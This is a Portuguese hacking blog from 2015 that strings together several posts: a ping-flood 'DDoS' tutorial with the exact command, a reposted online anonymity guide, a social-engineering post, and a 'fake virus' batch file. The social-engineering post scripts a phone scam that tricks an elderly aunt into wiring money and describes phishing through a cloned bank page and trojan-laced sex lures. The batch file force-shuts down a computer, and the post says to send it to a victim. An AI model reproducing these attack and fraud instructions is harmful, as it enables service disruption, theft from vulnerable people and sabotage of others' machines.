Pesquisar este blog

sexta-feira, 28 de agosto de 2015

Ataque a sites DDoS

Um ataque Ddos (Distributed Denial of Service) é quando um site recebeuitos acessos no mesmo momento, ou seja, o site fica instável pelas vitimas ao mesmo tempo, chegando aos limites do seu navegador. Mas, muitos perguntam?
Como eu faço esse ataque Ddos? Eu lhes ensinarei isso, vamos utilizar o CMD (Prompt do Comando) que todos os computadores com Sistema Operacional do Windows possue.
Vamos lá:

Primeiro passo: Abra o menu iniciar, e no campo de busca digite CMD. Após isso dê um clique no CMD para abri-lo.

Segundo passo: Temos que ter o IP do site-alvo. Para conseguir o IP do site alvo, digite: ping + site-alvo. Exemplo: Ping hackers24hrs.wordpress.com

Pronto! Já temos o IP do nosso site alvo! Agora basta que você digite o segundo código:
 ping IP-DO-SITE -l 65500 -n 10000000 -w 0.00001

Onde está IP-DO-SITE você irá colocar o IP do site-alvo! Agora de um Enter e aguarde algum tempo! É normal que sua internet fique MUITO lenta, pois está emviamdo os dados de pacotes para o site sobrecarregar! Agora irei explicar o significado dos códigos:

-n 10000000: O número de tentativas para a negação do serviço. Ali, você pode alterar o numero 10000000 para o valor de pacotes que deseja enviar ao sevidor do site.

-w 0.00001: é o tempo de espera depois do ataque do ping.

Observações:
Se você alterar o valor das letras não FUNCIONARÁ o ataque ao site!

terça-feira, 25 de agosto de 2015

#Anonymous - Como se manter anônimo na internet de forma segura.

 Créditos: http://forum.anonymousbrasil.com/index.php/topic,7620.0.html
=== Índice ===

1. Introdução
2. Primeiras dicas
3. Sobre os proxies
4. Cookies
5. Transferências FTP
6. Transação segura
7. SSL tunelling
8. Anonymous Remailers
9. Spyware
10. Faixas de limpeza
11. Mantendo-se anônimo no IRC
12. E-mail criptografado

=== 1. Introdução ===

Hoje em dia, todo mundo quer privacidade na web, porque não importa onde você vá, alguém pode estar observando você. Alguém como seu empregador, alguém que tenta cortar seu sistema, as empresas que recolhem todas as suas informações para vender para outras empresas, ou até mesmo o governo, pode estar no seu caminho enquanto você navega tranquilamente na web. Assim, o anonimato na web significa ser capaz usar todos os seus serviços sem nenhuma preocupação de alguém estar bisbilhotando seus dados.

O seu computador esta conectado à rede, ele tem um endereço IP (Internet Protocol). Se você tiver uma conexão dial-up, seu IP muda a cada vez que você se conectar à internet (isso nem sempre é verdade, no entanto. Há provedores de conexão discada, especialmente para estudantes universitários, que têm IPs estáticos). Cable modems e conexões DSL tem um IP estático, o que significa que o endereço IP não muda. Um dos objetivos de se manter anônimo é se certificar que seu IP (estático ou dinâmico), não seja revelado a outros usuários da internet, ou para administradores dos servidores que vagam ao utilizar serviços de internet.

Este texto tenta dar-lhe algumas dicas sobre como manter o seu anonimato na web. Algumas das sugestões podem parecer banais, mas acho que você realmente tem que obedece-las em quaisquer situações.

=== 2. Primeiras dicas ===

Ao conversar no IRC, ICQ, AIM (etc...), não forneça informações pessoais sobre si como onde você vive, seu trabalho, etc.

Não use seu endereço de e-mail principal em qualquer lugar exceto para membros da família, amigos ou pessoas de confiança. Em vez disso, crie para si mesmo uma conta de e-mail baseado na web, como Yahoo, Hotmail, mail.com, etc. E utilize este endereço de e-mail para se inscrever nesses serviços, ao invés dar seu e-mail para baixar algo, ou a publicar em sua página inicial.

Ao inscrever-se para serviços na web, não de sua informação real, como endereço, número de telefone e tal, a menos que você realmente precise para fazê-lo. Este é o tipo de informação que as empresas de coleta de informações gostariam de obter, de modo que eles possam vender para fora e encher sua caixa de correio com spam.

Use um proxy anônimo para navegar na web. Isso faz com que seu IP não seja armazenado nos registros do servidor da web. (Webservers registram cada solicitação GET feito, junto com a data, hora e IP. Este é o lugar onde o proxy entra. Eles irão obter o IP do proxy, não o seu). Use remailers anônimos para enviar seus e-mails.

A criptografia também pode ajudá-lo, certificando-se que o material que você vai enviar para fora da web, como um e-mail, etc, é cifrada, não permitindo que qualquer pessoa que não tem a chave possa lê-lo. Programas como o PGP (Pretty Good Privacy) são toolkits com tudo que você precisa para proteger suas coisas.

Exclua rastros de seu trabalho com o computador, incluindo arquivos de histórico, cache ou arquivos de backup.

=== 3. Sobre os proxies ===

Os proxies são caches que transmitem dados. Quando você configurar seu navegador para usar um proxy, ele nunca se conecta à URL. Em vez disso, sempre se conecta ao servidor proxy, e pede para obter a URL para você. Ele funciona de forma semelhante com outro tipo de serviços, tais como IRC, ICQ etc. Não será uma conexão direta entre você e o servidor, para que o seu verdadeiro endereço IP não seja revelado para o servidor. Quando você ver um site no servidor, o servidor não vai ver o seu IP. Alguns proxies web não suportam o encaminhamento dos cookies, cujo apoio é exigido por alguns dos sites (por ex. Hotmail).

Aqui estão algumas proxies anônimos que você pode usar para navegar anonimamente (observe que alguns destes podem ser pago):

Aixs - aixs.net
The Cloak - www.the-cloak.com
Rewebber - www.anon.de
Anonymizer - www.anonymizer.com

Você vai encontrar muito provavelmente vários sites que fornecem as listas de proxies e remailers não autorizadas. Essas listas estão sendo compilada, geralmente com a ajuda de scanners de portas, digitalização para computadores com wingate ou backdoors de outros proxies. Usar esses proxies é ilegal, e está sendo considerado como o acesso não autorizado de computador. Se você receber algum verifique se a informação é legal.

Se você de qualquer maneira decidir não usar proxy, pelo menos, não se esqueça de remover suas informações pessoais do seu browser. Depois de remover detalhes como seu nome e endereço de e-mail de seu navegador, a única informação de um site pode farejar é o seu endereço IP e localização geográfica.

Java e JavaScript pode assumir o controle de seu navegador de forma inesperada, e se você estiver navegando para lugares desconhecidos e potencialmente perigosos você deve estar ciente de que há erros em navegadores vulneráveis (principalmente os do Internet Explorer).

=== 4. Cookies ===

Talvez você não esteja ciente do fato de que é, se você tiver o recurso "permitir cookies" no seu navegador, os sites pode armazenar todos os tipos de informação no seu disco rígido. Cookies são pequenos arquivos que contêm vários tipos de informações que podem ser lidas pelos sites quando você estiver visitando-os. O uso mais comum é para rastrear dados demográficos para as agências de publicidade que querem ver apenas o que os consumidores de um determinado site estão procurando. Websites também usam cookies para manter suas informações de conta up-to-date. Então, por exemplo, quando você visitar o seu e-mail webbased sem ser unlogged, algumas horas mais tarde, você está sendo conectado, mesmo se você desligar o computador. Seu login e senha foi simplesmente armazenados no seu disco rígido no arquivo de cookie. Esta é uma ameaça à segurança em caso que há mais pessoas que têm o acesso ao seu computador.

As maiorias dos navegadores oferecem a possibilidade de se desligar os cookies, mas alguns sites como Hotmail.com obriga-os a ser ligado. No caso de você decidiu permitir cookies, pelo menos, nunca se esqueça de fazer logoff a partir de sites quando você terminar de acessa-los.

=== 5. Transferências FTP ===

Ao usar um programa cliente de FTP para baixar arquivos, assegurar-se que ele está dando uma senha falsa, como guest@unknown.com, não a sua real. Se o seu navegador permite que você desative o recurso que envia o seu endereço de e-mail como uma senha para sessões de FTP anônimas.

=== 6. Transação segura ===

Tudo que está sendo enviado a partir do servidor web para o seu navegador é geralmente em formato de texto simples. Isso significa que, toda a informação transferida pode ser "inalada" facilmente sobre a rota. Alguns dos servidores web suportam SSL (que significa Secure Socket Layer). Para visualizar e utilizar esses sites, você vai precisar de apoio SSL no seu browser também. Você reconhece que a conexão é criptografada, se a URL começa com "https://" em vez de "http://". Nunca use servidor web sem SSL para enviar ou receber informações confidenciais, privada ou de negócios (números de cartão de crédito, senhas etc.)

=== 7. SSL tunelling ===

- O que é SSL?

SSL significa Secure Socket Layer Secure implica uma criptografia, enquanto Socket Layer denota um acréscimo ao sistema Window Socket, Winsock. Para aqueles que não sabem, um soquete é um anexo a uma porta em um sistema. Você pode ter muitos soquetes em uma porta, desde que sejam non-blocking (permitindo o controle passar para outra aplicação tomada que deseje se conectar a essa porta).

A Secure Socket Layer significa que quaisquer bases debaixo dele, são seguros e protegidos. A ideia por trás do SSL era fornecer uma criptografada e, portanto, uma rota segura para o tráfego ao longo de um sistema baseado em soquete, tais como o TCP/IP (protocolo de internet). Isso permite mais segurança em transações com cartões de crédito na Internet, comunicações encriptadas e protegidas ao longo de uma linha de dados.

O SSL usa um padrão de criptografia desenvolvido pela RSA. A RSA é uma respeitada organização americana especializada em criptografia e segurança de dados. Inicialmente, eles desenvolveram um comprimento de cifra de apenas 40 bits para uso com o Secure Socket Layer, este foi considerado fraco e, portanto, uma criptografia cifra muito mais complicada foi criada, 128 bits. O raciocínio por trás dele era simples: ele precisa ser seguro.

A RSA coloca a vantagem de um comprimento mais longo de criptografia muito claramente: porque criptografia de 40 bits é considerada relativamente fraca. 128 bits tem cerca de 309 septilhões de vezes (309,485,000,000,000,000,000,000,000) maior do que 40-bits. Isto significaria que seria necessário muitas vezes mais de tempo para rachar ou quebrar a criptografia de 128 bits do que seria de 40 bits.

Se você quiser mais informações sobre os aspectos técnicos ou os mecanismo de criptografia SSL, visite seu site: www.rsasecurity.com/standards/ssl/.

- E como faço para implementar um SSL Tunnelling?

Sabemos que um Secure Socket Layer é seguro, mas o que não sabem é o que é um túnel. Na forma mais simples, um túnel é um proxy. Como o voto para procuração nas eleições gerais, um túnel irá retransmitir seus dados e trazer para você. Você pode estar ciente que já existem proxies. Tunnelling é feito através de proxies, mas não é considerado como sendo o mesmo.

Agora, se somarmos essa capacidade de Túnel de dados, todos os dados, em um tubo, para o Secure Sockets Layer, temos uma conexão fechada que é independente do software transportando-o.

- Então, como posso proteger as minhas conexões com SSL Tunnelling?

Para o Windows, a primeira parada seria http://www.totalrc.net. Este é um programa de túneis SSL que transforma uma conexão normal meias do proxy em uma conexão SSL.

A segunda parada, para Windows e Unix é stunnel. Stunnel é um kit GNU desenvolvido para encapsulamento SSL de qualquer conexão. Ele está disponível para download como compilação e binário aqui: mike.daewoo.com.pl/computer/stunnel

=== 8. Anonymous Remailers ===

Remailers são programas acessíveis na Internet via e-mail e Usenet para postar anonimamente (ou seja, o destinatário não pode determinar quem enviou o e-mail ou o artigo). Desta forma, o remetente não pode ser rastreado por cabeçalhos de roteamento incluídas no e-mail. Há diferentes classes de remailers, que permitem troca de e-mail anônimo e postagem anônima para USENET e muitas outras funcionalidades úteis.

Uma cadeia é um script de encadeamento remailer menu-driven:

www.obscura.com/crypto.html

Os cypherpunks remailers estão sendo desenvolvidos para fornecer um meio seguro de garantir o anonimato nas redes. Aqui você pode descobrir mais sobre os remailers disponíveis, aqueles que têm sido padrão na existência por um longo tempo, bem como os novos remailers experimentais e servidores anônimos.

www.csua.berkeley.edu/cypherpunks/remailer/

=== 9. Spyware ===

Como todos nós trabalhamos duro para tornar-se mais esclarecido sobre a proteção de nossas informações pessoais e se manter o mais anônimo possível na web, empresas de publicidade estão trabalhando tão duro para chegar a novas maneiras de obter nossas informações pessoais. Uma das maneiras que conseguir isso é através de spyware.

Spyware são os aplicativos que são empacotados junto com muitos programas que você baixa gratuitamente. Sua função é coletar informações pessoais sobre você e retransmiti-lo de volta para empresas de publicidade. A informação é então usada tanto para oferecer-lhe produtos ou vendida a outros anunciantes, para que eles possam promover seus produtos. Eles afirmam isso é tudo o que eles fazem com essa informação, mas o problema é que ninguém realmente sabe ao certo.

Spyware se encaixa na definição clássica de um trojan, pois é algo que você não negocia para mais quando você concordou em fazer o download do produto. Não só é uma invasão de privacidade, mas (especialmente se você tiver alguns tipos diferentes em sua máquina) também pode mastigar sua largura de banda, tornando a sua ligação à Internet mais lento.

Às vezes, esses espiões são realmente inofensivos, simplesmente conectando de volta para o servidor em casa para entregar para você mais publicidade. Alguns, como Gator por exemplo, enviar informações detalhadas sobre seus hábitos de navegação, sistema operacional, renda, idade demográfica etc.

Evitando spyware

Evitar spyware é cada vez mais difícil, à medida que mais distribuidores de software estão escolhendo-o como um método de lucrar com distribuições freeware e shareware. Ser suspeitoso de programas com ícones bonitos e pequenos como Gator. Além disso, assistir os wannabes Napster como AudioGalaxy, Limewire, e Kazaa. Eu ainda tenho que encontrar um que não incluem spyware. Antes de baixar, verifique se o programa é conhecido por conter spyware.

Para obter uma lista de spyware mais conhecido, o melhor que eu encontrei é aqui:

www.infoforce.qc.ca/spyware/enknownlistfrm.html

Livrando-se de spyware

Na maioria dos casos, você pode remover o spyware de seu sistema e ainda usar o aplicativo que você baixou. No caso de Gator e Comet Cursor, todo o programa é um spyware que deve ser completamente removido para evitar a espionagem.

Existem várias maneiras de se livrar de spyware no seu sistema. Você pode usar um firewall para monitorar as conexões de saída. Os programadores que colocarm essas coisas em conjunto, estão ficando mais "furtivos" sobre a obtenção de dados para contornar os firewalls. Comet Cursor, por exemplo utiliza um comando HTTP POST para conectar sem a intervenção de um firewall. Você também pode instalar um monitor de registro como Regmon para monitorar seu registro em indesejadas alterações mas isso não é infalível.

Provavelmente, o melhor método de remoção é baixar um programa de remoção de spyware e executá-lo como se fosse um antivírus. Os melhores exemplos destes programas são:

Adaware de Lavasoft. Disponível em http://www.lavasoftusa.com/ ou OptOut de cybernut profissional Steve Gibson. Disponível em: http://grc.com/optout.htm Ambos os programas são gratuitos e são atualizados regularmente.

Aqui estão alguns links, se você quiser saber mais sobre spyware:

www.spychecker.com
grc.com/optout.htm

=== 10. Faixas de limpeza ===

Burnt Cookies - permite a detecção automática e exclusão opcional de Cookies depositados por web-sites

SurfSecret - elimina automaticamente seus arquivos de cache, cookies, histórico, arquivos temporários, documentos recentes, e os conteúdos da Lixeira.

Nota: Uma sidenote em trilhas de limpeza. Quando você exclui alguns arquivos na sua máquina, estes não são realmente excluídos. Apenas a referência à sua localização no disco rígido é excluído, o que faz com que o seu sistema operacional pense que esses locais no HD está livre e pronto para assumir as coisas. Assim, existem formas de recuperar dados mesmo depois de apagá-las.

Há, no entanto, várias maneiras de limpar esta informação. Programas que enchem locais no disco rígido com zeros, então com 1s, em várias passagens são sua melhor aposta para garantir que nenhum documento vaze para mãos erradas. Um desses programas é o PGP. O PHPi agora vem com um utilitário que faz este trabalho, e você ainda pode selecionar o número de passes para limpar arquivos. Para todos os Unix, há também o programa "wipe". Use-os quando você sentir que tem dados que precisam de uma limpeza segura.


Créditos: http://forum.anonymousbrasil.com/index.php/topic,7620.0.html

Engenharia Social - Entenda

O que é Engenharia Social?

"Engenharia Social, e o ato de enganhar alguem para que a pessoa lhe faça algo que não faria normalmente, deixando um sistema vuneravel ou lhe dando acesso ao mesmo alem de lhe fornecer alguma informação de suma importancia que em suas mãos ou de outras Empresas/Pessoas poderia resultar em grandes perdas, mas principalmente um Engenheiro social aplica o golpe e a dita vitima nunca vai se dar conta que foi enganada"

- Não levem ao pé da letra, é a minha explicação.


Eu diria que a engenharia social é uma arte, pois envolve vários processos e necessita de uma certa experiencia (e por experiencia não digo tempo), ao mesmo tempo que é complexa também é simples, assim que se compreende sua lógica não se torna um grande desafio, porem cada caso é um caso.

Tudo isso vai depender do X da questão. Para quer você vai usar, assim fica mais facil direcionar o aprendizado, seu objetivo é Espionagem Industrial? - è um conteudo diferenciado -
No caso aqui como será um Tópico simples vou estar apenas abordando algumas coisas simples, só o conceito caso alguem queira algo mais "Aprofundado" pode me manda um MP ou sei lá =P.


Scamer ou Engenheiro Social?

A uma grande diferença entre Scamer, Estelenionatários e os Engenheiros Sociais, principalmente pelas áreas de atuação, os Engenheiros geralmente atuam no "ramo" de Empresas, sendo contratados pelas concorrentes ou são Free Lancers atrás de um dinehiro facil (Um variação para o carding), Enfim, um Scamer nunca vai ser um engenheiro, porem um engenheiro sempre vai ser um scamer, complicado né? digamos que o scamer é a parte mais baixa da piramide, eles na maioria são pessoas que quererm dinheiro facil sem estudar (Tipico), e aplicar golpes parece ser uma coisa facil igual o "Golpe da Tia" Rs. (Vou deixar um exemplo no final de "golpe da tia"), Assim como em algumas orgs (não convem dizer). Eles são calda - Mas como assim "calda", não era golpe agora é calda que porra é essa? tá mais sem sentido que Hora de Aventura -

Enfim vamos usar a analogia de um peixe, suponhamos que esse peixe se regenere porque ele tem alguma coisa especial na cabeça.
- Like aquele peixe do Simpsons - O Filme o da radiação, wharever

Efim se ele perder a calda, aquilo que faz ele nadar, ele consiguiria sobreviver? - Sim
Por quê? - Porque ele se regenera derr..

Ok..

E se ele perdesse a cabeça? - Morreria na Hora.

No caso dos Scamers eles são a calda, se eles cairem ou forem pegos não tem muito alarde nem grandes perdas (salvo alguns casos), então ninguem se importa muito com eles, geralmente não são Gênios e se utilizam de tecnicas batidas pra conseguir algum dinheiro.

- Mas cara se eles são tão ruins assim como as pessoas caem, nos golpes? -

Simples sempre vai existir alguem mais burro e mais inteligente que você, nessa caso, existem muitas pessoas burras - Rs. desculpa mais é a realidade.
Mesmo que essas pessoas não fossem tão burras assim, o ser humano tem extintos e geralmente é inevitavel seguilos explorando isso conseguimos aquilo que queremos deles, isso é um pouco de psicologia.

Existem algumas coisas que seduzem e geralmente fazem as pessoas cairem em golpes estupidos que você vê na TV e fala, como a pessoa caiu nisso?

Vamos fazer um Pequeno Rank.

1° Sexy Appel - Apele para o Sexo, e a pessoa para de pensar, e age igual um animal (Não literamente em alguns casos). [Funciona muito com homens]
2° Solidariedade - Sim a Solidariedade está antes da Ganância por incrivel que parece nós ajudamos as pessoas, mas deixo claro que em alguns casos é querendo algo em troca, então use 2 ° e 3 ° juntos.
3° Ganância - Falou em Dinheiro Amigo tem gente que faz tudo,pra ganhar 10 reais a mais - é serio -, a proposta de ganhar dinheiro facil seduz.

Ainda há mais alguns outros porem como o tópico já esta ficando muito estenso vou abordar apenas esses. OK?

Vamos lá.

Exemplo de Golpe

1° Sex Appel - Email de Alguma menina bonita, com um trojan, ou acesso a algum video de uma famosa ou famoso, propostas indecentes que são absurdas como uma panicat dando em cima de um cara com barriguinha de cerveja - sim ele vai cair -, Enfim pornografia em geral, com malwae, trojans, ou sites clonados dão muito certo.

2° Solidariedade - Tem varios exemplo vou usar o da Tia (como disse que faria), porem em um ambiente empresarial a situação muda, mas a ideia de poder ajudar um colega com problemas e bem tentador, e quando esse "colega" é um cargo a cima, a esperança de ser reconhecido com uma promoção faz as pessoas fazerem aquilo que você pedir [Leve em consideração, que você nem trabalha na empresa].

Personagens : Tia "Maria" Golpista "Sobrinho Claudio" - Let's Go !

#Telefone Toca a Tia Atende.

Tia : Aló
Golpista : Aló tia tudo bom?

#Nessa hora a tia vai tentar lembrar de alguem, porque ela tem sobinhos

Tia : é o Claudio?

#Pronto, agora você não Precisa chutar um nome e talvez errar, assuma o papel do claudio

Golpista : Sim tia é o claudio, como a senhora tá?
Tia: Eu to bem... E sua mãe seu pai, etc..

#Pergunta sobre a familia inteira, nem confirme nem negue, se ela pergunta se sua mãe volto de viagem [exemplo] diz que não sabe, e aplica o golpe logo

Golpista : Não sei se volto não tia... sabe por que? meu carro quebro e eu tava viajando, e eu to na estrada e não sei porque não caiu o dinheiro na minha conta, eu to aqui no posto porque o cara reboco o carro pra mim..

#Nessa hora ela vai se impressionar, se quiser pode usar o contexto de um acidente funciona melhor [Agora se a tia odiar o sobrinho ferro!]

Tia: Meu Deus claudio..

#Antes dela fala você continua

Golpista: Tia.. não queria pedir pra senhora mas não tem como me depositar um dinheiro só pra pagar o reboque, porque ele reboco mais eu não paguei ele.

#Fale o valor, faça um voz triste

Golpista: Desculpa pedir, mas é uma emergência.

#Nessa hora ele vai se sensibilizar com sua Historia e provavelmente vai dizer que sim, então acelere

Golpista: Tia anota minha conta, que eu fiz outra, que a bateria ta acabando,*Chinga o Celular pela pouca bateria*, anota ai...[Diz a conta que quer a trasnferencia]

#Agradece e diz que a ligação tá ruim e a bateria e desliga, ela vai sair pra depositar, se possivel de um prazo para ela fazer tal deposito, assim enfatiza a urgência.

-| Esse golpe é uma encenação, não me responsabilizo se alguem aplicar o mesmo, todo o material aqui é de caráter educativo | --

3° Ganância - Apele para dinheiro sortei ou faça com que a pessoa pense que perdeu dinheiro, exemplo um email fake do banco da pessoa, falando que fizeram uma compra no nome dela e pedindo pra entrar no link a baixo para confirmar ou cancelar a compra, a pessoa vai acessar na hora, faça uma pagina clonada do banco da pessoa, assim que ela digitar os dados, eles são enviados pra você.

Como conseguir esses dados?

Bom ai cada um faz do seu jeito, faça seus teste e pense como seria, como você faria ou como agiria em uma situação dessas...

Um Bom engenheiro social não deixa brechas não tem como você desconfiar aplique seu golpes de modo rapido, quando a pessoa menos espera, seja convincente..

Peço desculpas pelo conteudo que ficou um pouco extenso e talvez não tenha respondido a todas as duvidas, porem isso é um introdução ainda vou fazer mais tópicos e talvez libere alguns golpes em pdf para vocês com todas as respostas possiveis e como agir e etc..

enfim se for entrar nesse mundo seja um Engenheiro seja inteligente, Estude Um pouco de psicologia, postura corporal, tom de voz e etc... qualquer duvida podem me mandar um MP ou postar aqui no tópico, se o tópico ficou vago só em dizer que tento explicar da melhor maneira possivel.


"A melhor mentira e aquela que você mesmo acredita, porque ela se torna verdade"

*A Maioria dos golpes são feitos pela internet, então estude um pouco de hacking*

-// Perdão Por algum erro de português, porem ficou muito grande e escrevi com pouco tempo \\-

Como Criar Um Víruz Falso

Como Criar Um Vírus Falso

Abra o bloco de notas. O bloco de notas lhepermitirá digitar textos com praticamente nenhuma formatação. Clique em iniciar -> Todos os programas -> Acessórios -> Bloco de notas

Se você estiver em um Mac, utilize o TextEdit.

Crie um pequeno arquivo batch. Insira o seguinte em seu arquivo de texto:

@echo off
echo hahahaha eu estou hackeando o seu computador
shutdown -s -f -t 60 -c "digite a mensagem que você queira que seja apresentada"

Clique em "arquivo" e, em seguida, em "Salvar Como".

Mude a extensão do arquivo de .txt para .bat ou .cmd

Mude de "Documentos de texto" para "Todos os arquivos".

Salva e agora envie o arquivo para vitima.